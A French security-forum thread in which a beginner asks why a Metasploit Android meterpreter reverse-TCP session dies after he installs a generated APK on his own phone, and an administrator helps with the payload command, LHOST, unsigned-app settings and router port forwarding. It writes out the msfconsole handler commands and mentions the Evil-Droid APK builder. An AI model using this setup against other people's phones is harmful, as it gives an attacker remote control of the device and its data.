Auteur Sujet: [Résolu] Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter  (Lu 5658 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Bonjour tout le monde, Je veux essayer Metasploit pour la première fois sur mon propre Smartphone Android.
Tout fonctionne, je crée mon fichier apk sur mon bureau et ensuite j'effectue les commandes suivantes :
msfconsole
use exploit/multi/handler
set playload android/meterpreter/reverse_tcp
set lhost MON ADRESSE IP
set lport 4444
exploit

Et ensuite je mets l'apk sur mon smartphone et je l'installe. J'éxecute la commande et ça me met ceci :
  • Started reverse TCP handler on MON IP:4444

Mais normalement, dans l'article que j'ai lu, il doit y a voir aussi :
  • Starting the playload handler...

Pourtant moi il m'affiche que
  • Started reverse TCP handler on MON IP:4444

Donc, j'ai décidé de lancer l'application sur mon smartphone et ces commandes s'éxecutent :

  • Sending stage (179779 bytes) to 192.168.1.4
  • 192.168.1.4 - Meterpreter session 1 closed.  Reason: Died
  • Meterpreter session 1 opened (127.0.0.1 -> 192.168.1.4:42327) at 2019-06-03 10:54:13 +0000


Et le 2ème problème est que rien ne se lance ! Normalement il doit y avoir : meterpreter > mais pourtant rien ne se passe pour moi.
Pouvez-moi m'aider ? Merci. Passez une bonne journée  :)
« Modifié: 05 juin 2019 à 07:51:42 par ZeR0-@bSoLu »

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #1 le: 03 juin 2019 à 10:49:13 »
Salut,

Avant de te répondre je me permets de te signaler que ce serai plus propre que tu utilises des balises codes quand tu marques des commande :)

Pour te répondre ensuite , la commande c'est :
set payload et non "playload"
Ton LHOST est-il bien renseigné ? ton port est-il ouvert sur ta box ? LAN ou WAN ?
Téléphone rooté ?
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #2 le: 03 juin 2019 à 12:48:55 »
Bonjour ZeR0-@bSoLu et merci pour ta réponse ! J'ai utilisé Evil-Droid car j'ai vu que c'était mieux et tout fonctionne sauf que : quand je lance l'application sur mon smartphone, meterpreter s'affiche mais quelques secondes plus tard, ce message arrive et je ne peux plus rien faire :
IP DU SMARTPHONE : Meterpreter session 1 closed. Reason : Died.

Comment puis-je résoudre ce problème ?

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #3 le: 03 juin 2019 à 12:50:16 »
De rien ^^'
TU n'a pas répondu à ce que j'ai dis pour autant :)
Si tu ne me réponds pas je ne pourrais pas t'aider :)
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #4 le: 03 juin 2019 à 13:00:17 »
Oops, désolé  :-\ !
Oui mon LHOST est bien renseigné et le téléphone n'est pas rooter.
Par contre, je ne sais pas comment vérifier le port de ma box et si c'est en WAN ou LAN

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #5 le: 03 juin 2019 à 13:03:28 »
https://support.google.com/wifi/answer/6274166?hl=fr => définition WAN & LAN
As-tu autorisé ton téléphone à lancer les programmes non signés ?

P.S : pas de souçis :)
P.S2 : quel est le modèle de ta box ?
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #6 le: 03 juin 2019 à 13:05:36 »
Tenda
J'ai activé les sources inconnues;
« Modifié: 03 juin 2019 à 13:09:37 par Camillerakoto »

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #7 le: 03 juin 2019 à 13:09:02 »
https://portforward.com/tenda/d301/

P.S : la réponse à ma question reste un peu imprécise ^^' c'est comme si je t'avais demandé le modèle de ta voiture et que tu m'avais répondu juste "Peugeot" ^'
« Modifié: 03 juin 2019 à 13:19:02 par ZeR0-@bSoLu »
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #8 le: 03 juin 2019 à 13:30:46 »
Je suis vraiment désolé car je ne m'y connais pas encore très bien. C'est une ADSL Tenda Home

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #9 le: 03 juin 2019 à 13:31:48 »
Pas de souçis , tu as lu le doc que je t'ai donné ?
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #10 le: 03 juin 2019 à 13:36:07 »
Oui mais  je ne cromprends à quoi cela sert-il et comment le faire.

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #11 le: 03 juin 2019 à 13:37:27 »
Ben comment le faire c'est indiqué dans la doc xD
Pourquoi ben c'est très simple si tu es en WAN alors comme la connexion passe par ta box il faut dire à ta box de "laisser" passer la connexion sur le port voulu
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto

  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #12 le: 03 juin 2019 à 13:52:51 »
En fait je ne comprends pas ce qu'il faut faire.
Vraiment, désolé.

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #13 le: 03 juin 2019 à 13:56:17 »
Qu'es ce que tu ne comprends pas exactement ? faut que tu me dises précisément pour que je puisses t'expliquer :)
Mess  with the bests.
Die like the rest.

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2846
  • +162/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #14 le: 03 juin 2019 à 14:04:35 »
Citer
Login to your Tenda D301 router.
Navigate to the port forwarding section.

    Click the Advanced button.
    Click the Advanced Setup link.
    Click on NAT.
    Click on Virtual Servers.
    Click the Add button.

Create a port forward entry.

Jusqu'a la ça va ou faut que je te traduise ? :)

ça peut être une raison oui même si normalement la présence d'un port fermé se traduirait par une absence totale de connexion
Mess  with the bests.
Die like the rest.